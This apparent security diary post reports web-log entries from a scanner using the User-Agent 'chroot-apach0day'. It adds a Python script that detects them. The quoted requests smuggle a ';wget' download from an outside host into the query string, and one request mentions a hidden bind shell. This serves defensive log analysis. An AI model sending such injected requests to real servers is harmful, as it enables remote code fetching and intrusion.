Our reader Robin submitted the following detect:

I've got a site that was scanned this morning by a tool that left these entries in the logs:

[HTTP_USER_AGENT] => chroot-apach0day
[HTTP_REFERRER] => /xA/x0a/x05
[REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget http://proxypipe.com/apach0day

The URL that appears to be retrieved does not exist, even though the domain does.

In our own web logs, we have seen a couple of similar requests:

22.214.171.124 - - [28/Jul/2014:05:07:15 +0000] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
126.96.36.199 - - [28/Jul/2014:18:48:36 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
188.8.131.52 - - [28/Jul/2014:20:04:07 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB" "-"

If anybody has any ideas what tool causes these entries, please let us know. Right now, it doesn't look like this is indeed an "Apache 0 Day". There are a couple of other security related sites where users point out this user agent string, with little insight as to what causes the activity or what the goal is.
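The three log lines above are in Apache combined log format with one extra trailing field. As an added example (not code from the diary or from ISC), the following script parses lines in that format and flags the two indicators the diary describes: the "chroot-apach0day" User-Agent string and a ";wget" command-style sequence inside the query string. The sample input embeds the page's three lines plus one constructed benign line; the field names and indicator labels are my own.

```python
import re
from urllib.parse import unquote

# Apache combined log format; the page's lines carry one more quoted field
# after the User-Agent, which the unanchored pattern simply ignores.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) '
    r'(?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" '
    r'"(?P<ua>[^"]*)"'
)

# Constructed sample: the three requests quoted in the diary plus one benign line.
SAMPLE_LOG = """\
22.214.171.124 - - [28/Jul/2014:05:07:15 +0000] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
126.96.36.199 - - [28/Jul/2014:18:48:36 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
188.8.131.52 - - [28/Jul/2014:20:04:07 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB" "-"
203.0.113.10 - - [28/Jul/2014:20:05:00 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0" "-"
"""

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["uri_decoded"] = unquote(rec["uri"])  # %20 -> space, so ";wget ..." is visible
    return rec

def indicators(rec):
    """Return the list of page-derived indicators matched by one parsed record."""
    hits = []
    if "chroot-apach0day" in rec["ua"]:
        hits.append("ua:chroot-apach0day")
    if "BINDSHELL" in rec["ua"].upper():
        hits.append("ua:bindshell-marker")
    # a shell separator followed by a download command inside the request URI
    if re.search(r";\s*(wget|curl)\b", rec["uri_decoded"]):
        hits.append("uri:command-style-wget")
    return hits

def scan(log_text):
    """Return (ip, timestamp, indicators) for every line that matches at least one indicator."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is not None and indicators(rec):
            alerts.append((rec["ip"], rec["ts"], indicators(rec)))
    return alerts

if __name__ == "__main__":
    for ip, ts, hits in scan(SAMPLE_LOG):
        print(ip, ts, ", ".join(hits))
```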
- Interesting HTTP User Agent "chroot-apach0day", (Mon, Jul 28th) July 28, 2014